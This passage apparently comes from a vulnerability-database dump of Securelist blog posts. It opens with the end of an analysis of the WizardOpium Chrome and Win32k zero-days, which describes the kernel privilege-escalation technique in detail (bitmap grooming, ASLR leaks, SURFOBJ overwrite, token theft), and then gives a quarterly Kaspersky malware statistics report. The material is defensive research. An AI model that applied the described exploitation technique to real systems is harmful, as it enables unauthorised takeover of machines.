to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation._", "cvss3": {}, "published": "2020-05-28T10:00:09", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "modified": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-31T11:03:47", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2021:\n\n * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.\n * 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.\n * Ransomware attacks were defeated on the computers of 91,841 unique users.\n * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nAt the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. This quarter, in total, Kaspersky solutions blocked the malware of such type on the computers of 118,099 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_\n\n**Attack geography**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 6.3 \n2 | Tajikistan | 5.3 \n3 | Afghanistan | 4.8 \n4 | Uzbekistan | 4.6 \n5 | Paraguay | 3.2 \n6 | Yemen | 2.1 \n7 | Costa Rica | 2.0 \n8 | Sudan | 2.0 \n9 | Syria | 1.5 \n10 | Venezuela | 1.4 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nAs before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families. The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 30.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 \n3 | Trickster | Trojan.Win32.Trickster | 7.5 \n4 | Emotet | Backdoor.Win32.Emotet | 7.4 \n5 | RTM | Trojan-Banker.Win32.RTM | 6.6 \n6 | Nimnul | Virus.Win32.Nimnul | 5.1 \n7 | Nymaim | Trojan.Win32.Nymaim | 4.7 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 2.2 \n \n_** Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n**New additions to the ransomware arsenal**\n\nLast year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.\n\nREvil (aka Sodinokibi) is another group looking to increase its extortion leverage. In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.\n\n**Attacks on vulnerable Exchange servers**\n\n[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector was seen being used by the Black Kingdom and DearCry families.\n\n**Publication of keys**\n\nThe developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.\n\n**Law enforcement successes**\n\nLaw enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.\n\nFrench and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors. The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.\n\nIn South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).\n\n### Number of new modifications\n\nIn Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2020 \u2013 Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.31% \n2 | Ethiopia | 0.62% \n3 | Greece | 0.49% \n4 | Pakistan | 0.49% \n5 | China | 0.48% \n6 | Tunisia | 0.44% \n7 | Afghanistan | 0.42% \n8 | Indonesia | 0.38% \n9 | Taiwan, Province of China | 0.37% \n10 | Egypt | 0.28% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% \n4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% \n5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% \n6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom\n\nVirus.Win32.PolyRansom | 3.78% \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% \n8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% \n9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% \n10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. And though January and February passed off relatively calmly, March saw a sharp rise in the number of new modifications \u2014 more than fourfold compared to February.\n\n_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year's trend, whereby the number of users attacked by miners actually fell. For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.\n\n_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_\n\n### Attack geography\n\n_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 4.65 \n2 | Ethiopia | 3.00 \n3 | Rwanda | 2.37 \n4 | Uzbekistan | 2.23 \n5 | Kazakhstan | 1.81 \n6 | Sri Lanka | 1.78 \n7 | Ukraine | 1.59 \n8 | Vietnam | 1.48 \n9 | Mozambique | 1.46 \n10 | Tanzania | 1.45 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nIn Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) \u2014 use-after-free vulnerabilities in Microsoft Excel \u2014 and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we've often written about, were also in demand. Note the age of these vulnerabilities \u2014 even the latest of them was discovered almost three years ago. So, once again, we remind you of the importance of regular updates.\n\nThe first quarter was rich not only in known exploits, but also new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>)\u2014 a service-side request forgery vulnerability that allows remote code execution (RCE)\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>)\u2014 an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>)\u2014 a post-authorization arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>)\u2014 as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authorized Microsoft Exchange user to write data to an arbitrary file in the system\n\nFound [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.\n\nDuring the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem. Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_\n\nThe second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there was no doing without newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt the heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:\n\n * [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>)\u2014 heap buffer overflow in the V8 script engine, leading to remote code execution\n * [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)\u2014 overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution\n * [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>)\u2014 bypassing security restrictions when using an iframe.\n\nOther interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights. Critical vulnerabilities in the popular SolarWinds Orion Platform \u2014 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) \u2014 caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.\n\nAnalysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-force passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).\n\n## Attacks on macOS\n\nQ1 2021 was also rich in macOS-related news. Center-stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS). In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 18.01 \n2 | AdWare.OSX.Pirrit.j | 12.69 \n3 | AdWare.OSX.Pirrit.o | 8.42 \n4 | AdWare.OSX.Bnodlero.at | 8.36 \n5 | Monitor.OSX.HistGrabber.b | 8.06 \n6 | AdWare.OSX.Pirrit.gen | 7.95 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 \n8 | AdWare.OSX.Cimpli.m | 6.17 \n9 | AdWare.OSX.Pirrit.aa | 6.05 \n10 | Backdoor.OSX.Agent.z | 5.27 \n11 | Trojan-Downloader.OSX.Agent.h | 5.09 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Ketin.h | 4.02 \n14 | AdWare.OSX.Bnodlero.bc | 3.87 \n15 | AdWare.OSX.Bnodlero.t | 3.84 \n16 | AdWare.OSX.Cimpli.l | 3.75 \n17 | Trojan-Downloader.OSX.Lador.a | 3.61 \n18 | AdWare.OSX.Cimpli.k | 3.48 \n19 | AdWare.OSX.Ketin.m | 2.98 \n20 | AdWare.OSX.Bnodlero.ay | 2.94 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nTraditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan's task is to download adware from the Pirrit and Bnodlero families. But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.\n\n### Threat geography\n\n_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 4.62 \n2 | Spain | 4.43 \n3 | Italy | 4.36 \n4 | India | 4.11 \n5 | Canada | 3.59 \n6 | Mexico | 3.55 \n7 | Russia | 3.21 \n8 | Brazil | 3.18 \n9 | Great Britain | 2.96 \n10 | USA | 2.94 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000) \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol. A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.\n\nTelnet | 69.48% \n---|--- \nSSH | 30.52% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 77.81% \n---|--- \nSSH | 22.19% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | China | 33.40 \n2 | India | 13.65 \n3 | USA | 11.56 \n4 | Russia | 4.96 \n5 | Montenegro | 4.20 \n6 | Brazil | 4.19 \n7 | Taiwan, Province of China | 2.32 \n8 | Iran | 1.85 \n9 | Egypt | 1.84 \n10 | Vietnam | 1.73 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**\n\n** ** | **Country** | **%*** \n---|---|--- \n1 | USA | 24.09 \n2 | China | 19.89 \n3 | Hong Kong | 6.38 \n4 | South Korea | 4.37 \n5 | Germany | 4.06 \n6 | Brazil | 3.74 \n7 | Russia | 3.05 \n8 | Taiwan, Province of China | 2.80 \n9 | France | 2.59 \n10 | India | 2.36 \n \n_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._\n\n### Threats loaded into traps\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 50.50% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% \n3 | Backdoor.Linux.Gafgyt.a | 3.01% \n4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% \n5 | Backdoor.Linux.Mirai.a | 2.72% \n6 | Backdoor.Linux.Mirai.ba | 2.67% \n7 | Backdoor.Linux.Agent.bc | 2.37% \n8 | Trojan-Downloader.Shell.Agent.p | 1.37% \n9 | Backdoor.Linux.Gafgyt.bj | 0.78% \n10 | Trojan-Downloader.Linux.Mirai.d | 0.66% \n \n_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.\n\n_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 15.81 \n2 | Ukraine | 13.60 \n3 | Moldova | 13.16 \n4 | Kyrgyzstan | 11.78 \n5 | Latvia | 11.38 \n6 | Algeria | 11.16 \n7 | Russia | 11.11 \n8 | Mauritania | 11.08 \n9 | Kazakhstan | 10.62 \n10 | Tajikistan | 10.60 \n11 | Uzbekistan | 10.39 \n12 | Estonia | 10.20 \n13 | Armenia | 9.44 \n14 | Mongolia | 9.36 \n15 | France | 9.35 \n16 | Greece | 9.04 \n17 | Azerbaijan | 8.57 \n18 | Madagascar | 8.56 \n19 | Morocco | 8.55 \n20 | Lithuania | 8.53 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 47.71 \n2 | Turkmenistan | 43.39 \n3 | Ethiopia | 41.03 \n4 | Tajikistan | 38.96 \n5 | Bangladesh | 36.21 \n6 | Algeria | 35.49 \n7 | Myanmar | 35.16 \n8 | Uzbekistan | 34.95 \n9 | South Sudan | 34.17 \n10 | Benin | 34.08 \n11 | China | 33.34 \n12 | Iraq | 33.14 \n13 | Laos | 32.84 \n14 | Burkina Faso | 32.61 \n15 | Mali | 32.42 \n16 | Guinea | 32.40 \n17 | Yemen | 32.32 \n18 | Mauritania | 32.22 \n19 | Burundi | 31.68 \n20 | Sudan | 31.61 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_\n\nOverall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.", "cvss3": {}, "published": "2021-05-31T10:00:05", "type": "securelist", "title": "IT threat evolution Q1 2021. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:05", "id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "href": "https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Use-after-free in WebAudio in Google Chrome allows a remote attacker to potentially exploit heap corruption.", "cvss3": {"exploitabilityScore": 2.8, 